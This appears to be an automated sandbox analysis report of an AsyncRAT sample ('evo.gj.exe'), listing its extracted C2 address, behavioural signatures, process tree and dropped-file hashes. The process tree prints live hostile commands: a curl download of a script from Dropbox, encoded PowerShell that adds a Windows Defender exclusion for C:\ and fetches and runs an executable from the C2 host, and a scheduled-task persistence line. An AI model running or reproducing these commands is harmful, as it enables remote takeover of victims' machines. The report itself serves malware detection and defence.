Analysis
-
max time kernel
146s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
29/03/2025, 23:30
General
-
Target
evo.gj.exe
-
Size
2.8MB
-
MD5
dee0ebab182b215c4e1fb1c7da903d8a
-
SHA1
84c3444a053cb709a4dd9b9928b40b4373b78732
-
SHA256
49fcfcbb8cc1c85f2c7ec36eb139df3b70b898689b8e7f58b7c054ca900a9ce4
-
SHA512
fa9c0d00dfb679a4d1c324390bcf2f8d562cf779e4f5487cb508f7167842c3453f545db593a218df3633aa36de98578115b9eaff7cd7b59969b1b264f78deb5c
-
SSDEEP
49152:z7YGtlq/IU6iZXNVxrGiPsPAmpoAzjicaCNH2kLLKevfQfGVGNPq0ATmn9/:X9+brGiPoB421fQOVGU05
Malware Config
Extracted
http://3.27.199.84:3000/RuntimeBrokerSvc.exe
Extracted
asyncrat
0.5.8
Default
3.27.199.84:9182
gRLpFG01LHh3
-
delay
3
-
install
true
-
install_file
RuntimeBrokerSvc.exe
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
Async RAT payload 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file 1 IoCs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
-
Drops file in System32 directory 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Modifies registry class 3 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 37 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\evo.gj.exe"C:\Users\Admin\AppData\Local\Temp\evo.gj.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start https://discord.gg/7drg5EN8hm2⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/7drg5EN8hm3⤵
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2c4,0x324,0x7ff9c22df208,0x7ff9c22df214,0x7ff9c22df2204⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1780,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:34⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2180,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=2176 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2576,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=2592 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3488,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4900,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=5028 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4976,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=5088 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5424,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=5404 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5712,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5824,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=5972 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5956,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=5988 /prefetch:84⤵
- Modifies registry class
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6440,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=4892 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6440,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=4892 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5856,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=5924 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5536,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=6720 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5516,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=6556 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6524,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6540,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=6776 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1104,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6656,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=6628 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6676,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=6672 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5460,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=6760 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6368,i,15427048896501079078,14682996638466833152,262144 --variations-seed-version --mojo-platform-channel-handle=4964 /prefetch:84⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c curl -s -L -o "C:\Windows\Temp\buildtools.js" "https://www.dropbox.com/scl/fi/g6aq67bqkxahqvxyu00f4/a.js?rlkey=j35evp359i6vb6wnhp3tenoqo&st=uqv05xq0&dl=1" > NUL 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c curl -s -L -o "C:\Windows\Temp\buildtools.js" "https://www.dropbox.com/scl/fi/g6aq67bqkxahqvxyu00f4/a.js?rlkey=j35evp359i6vb6wnhp3tenoqo&st=uqv05xq0&dl=1"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl -s -L -o "C:\Windows\Temp\buildtools.js" "https://www.dropbox.com/scl/fi/g6aq67bqkxahqvxyu00f4/a.js?rlkey=j35evp359i6vb6wnhp3tenoqo&st=uqv05xq0&dl=1"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wscript "C:\Windows\Temp\buildtools.js"2⤵
-
C:\Windows\system32\wscript.exewscript "C:\Windows\Temp\buildtools.js"3⤵
- Checks computer location settings
- Drops file in System32 directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnACIAOwAgAHIAZQBnACAAYQBkAGQAIAAnAEgASwBMAE0AXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABFAHgAYwBsAHUAcwBpAG8AbgBzAFwAUABhAHQAaABzACcAIAAvAHYAIAAnAEMAOgBcACcAIAAvAHQAIABSAEUARwBfAFMAWgAgAC8AZAAgACcAQwA6AFwAJwAgAC8AZgA=4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ /t REG_SZ /d C:\ /f5⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAGEASABSADAAYwBEAG8AdgBMAHoATQB1AE0AagBjAHUATQBUAGsANQBMAGoAZwAwAE8AagBNAHcATQBEAEEAdgBVAG4AVgB1AGQARwBsAHQAWgBVAEoAeQBiADIAdABsAGMAbABOADIAWQB5ADUAbABlAEcAVQA9ACcAKQApACAACgAkAEIAMgAgAD0AIAAiACQAKAAkAGUAbgB2ADoAVABlAG0AcAApAFwAJAAoACgAJwBSACcALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApAFsAMAAuAC4AMgBdACAALQBqAG8AaQBuACAAJwAnACkAKwAnAEIAJwArACgAJwByACcALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApAFsAMAAuAC4AMQBdACAALQBqAG8AaQBuACAAJwAnACkAKwAnAGsAJwArACgAJwBlACcALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApAFsAMAAuAC4AMABdACAALQBqAG8AaQBuACAAJwAnACkAKwAnAHIAJwArACcALgBlAHgAZQAnACkAIgAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAEEAMQAgAC0ATwB1AHQARgBpAGwAZQAgACQAQgAyAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABCADIA4⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\RBrker.exe"C:\Users\Admin\AppData\Local\Temp\RBrker.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "RuntimeBrokerSvc" /tr '"C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe"' & exit6⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "RuntimeBrokerSvc" /tr '"C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe"'7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8BC5.tmp.bat""6⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe"C:\Users\Admin\AppData\Roaming\RuntimeBrokerSvc.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "RuntimeBrokerSvc"8⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /f /tn "RuntimeBrokerSvc"9⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC241.tmp.bat""8⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\timeout.exetimeout 39⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2JavaScript
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
85B
MD5c3419069a1c30140b77045aba38f12cf
SHA111920f0c1e55cadc7d2893d1eebb268b3459762a
SHA256db9a702209807ba039871e542e8356219f342a8d9c9ca34bcd9a86727f4a3a0f
SHA512c5e95a4e9f5919cb14f4127539c4353a55c5f68062bf6f95e1843b6690cebed3c93170badb2412b7fb9f109a620385b0ae74783227d6813f26ff8c29074758a1
-
Filesize
66B
MD5496b05677135db1c74d82f948538c21c
SHA1e736e675ca5195b5fc16e59fb7de582437fb9f9a
SHA256df55a9464ee22a0f860c0f3b4a75ec62471d37b4d8cb7a0e460eef98cb83ebe7
SHA5128bd1b683e24a8c8c03b0bc041288296448f799a6f431bacbd62cb33e621672991141c7151d9424ad60ab65a7a6a30298243b8b71d281f9e99b8abb79fe16bd3c
-
Filesize
134B
MD5049c307f30407da557545d34db8ced16
SHA1f10b86ebfe8d30d0dc36210939ca7fa7a819d494
SHA256c36944790c4a1fa2f2acec5f7809a4d6689ecb7fb3b2f19c831c9adb4e17fc54
SHA51214f04e768956bdd9634f6a172104f2b630e2eeada2f73b9a249be2ec707f4a47ff60f2f700005ca95addd838db9438ad560e5136a10ed32df1d304d65f445780
-
Filesize
1KB
MD5ee002cb9e51bb8dfa89640a406a1090a
SHA149ee3ad535947d8821ffdeb67ffc9bc37d1ebbb2
SHA2563dbd2c90050b652d63656481c3e5871c52261575292db77d4ea63419f187a55b
SHA512d1fdcc436b8ca8c68d4dc7077f84f803a535bf2ce31d9eb5d0c466b62d6567b2c59974995060403ed757e92245db07e70c6bddbf1c3519fed300cc5b9bf9177c
-
Filesize
79B
MD57f4b594a35d631af0e37fea02df71e72
SHA1f7bc71621ea0c176ca1ab0a3c9fe52dbca116f57
SHA256530882d7f535ae57a4906ca735b119c9e36480cbb780c7e8ad37c9c8fdf3d9b1
SHA512bf3f92f5023f0fbad88526d919252a98db6d167e9ca3e15b94f7d71ded38a2cfb0409f57ef24708284ddd965bda2d3207cd99c008b1c9c8c93705fd66ac86360
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
3KB
MD5f9fd82b572ef4ce41a3d1075acc52d22
SHA1fdded5eef95391be440cc15f84ded0480c0141e3
SHA2565f21978e992a53ebd9c138cb5391c481def7769e3525c586a8a94f276b3cd8d6
SHA51217084cc74462310a608355fbeafa8b51f295fb5fd067dfc641e752e69b1ee4ffba0e9eafa263aab67daab780b9b6be370dd3b54dd4ba8426ab499e50ff5c7339
-
Filesize
280B
MD5c37f9d2c357647fca20f2eaa89c18edd
SHA1cfd1035ed2d057c317b48546f467209cbbe15f2e
SHA2562ea3a0b7e6145fd110653b1a77cb827ad7e4a145c29378344bd3d28f595b2072
SHA5123563f4aca9e47f35de8cb38e42a3c0448bb3ec4c9183fa392abc28fee4ca08bf16da028ffbf31cf0c0f8301ed810238961e745590e5c71621bc5a2a889dd12f7
-
Filesize
4KB
MD58f9032940d892645da4b23cf4847f112
SHA169c4de1fcbbbd8e6e5cb58668dd135d1211547ef
SHA256b361203fb4ecbb9c4daac34fb44bba30c9c06b69d2c813d330f1fc36782db5b1
SHA5129834490859e5828e68ee97d621e85663639ff741c3e748f24d5cbb32e23becf23c3b9a9ba87d0ae41c2ba8e27aab2205f17ceaad9b0e3e9c4bd695c20b3a77de
-
Filesize
3KB
MD50c99cab07e44ea7357e0c7da8e853f5b
SHA197c41696599dea1b8f25b81d217d46503acb06ef
SHA2567eae564474dedfa368b982e922c1b3ba584c89ac414bf7deaec24f510b334650
SHA512d8e47979bb15f2a5ac8fb0ce302abec0029267776b3a3b38eb2a2e75d41b10c5f640e07508684d6507de7f23ee061e17bf56ca10265faabcaa265e337af2f64a
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
107KB
MD540e2018187b61af5be8caf035fb72882
SHA172a0b7bcb454b6b727bf90da35879b3e9a70621e
SHA256b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5
SHA512a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12
-
Filesize
3KB
MD52f66fa695a0f29fb343b3b7f4fae2e0b
SHA137b5431e02a79fb346c1226a45b20841ee78980d
SHA256294a790b6b02424d938eb74a7b27cdf9a2f20072fb8dbb1da94be7a93945fa96
SHA512ea426a6602f5973ced1ccc908f9836ab8310452110124e102f52e0b621885f61f8ce22af7d0dac1a03f20103d25b6a8315252622279768e676968f61cf0ba3c7
-
Filesize
2KB
MD5ba6f8f72f2b0e5abd7a98f46db21692b
SHA14e2a769ab7b20e7137cd8083ec47b4a3a244225a
SHA2563035de2f46cb93919799807aa66629cdee6acb4c070a52069d1a62c2c8faa931
SHA512cd9ba9f5818199120ce4a28359012a11ade6221e086692f10c7e3135f01144fd6082ea47a686246bc89c824baa82674bd13fc9d8b3349c9b927713b1e930b124
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
Filesize
17KB
MD5de1b47aff9dc661519795cbd9d83adb9
SHA19256213aa36fa97c54ae2794b68e5f32ce1fea0d
SHA2563de35905031f793209de10fe5df65c46b88a889b2b8bf4a13adfb8431c912cb9
SHA51210d794e0d6b9fd263b74dd8fdfc199e7b6b8c7686991a66de654a841c946d559ef94f23172555bb7c08cbed9fc7f6417083a71b4d6fd5cf869efd0978ae015bd
-
Filesize
17KB
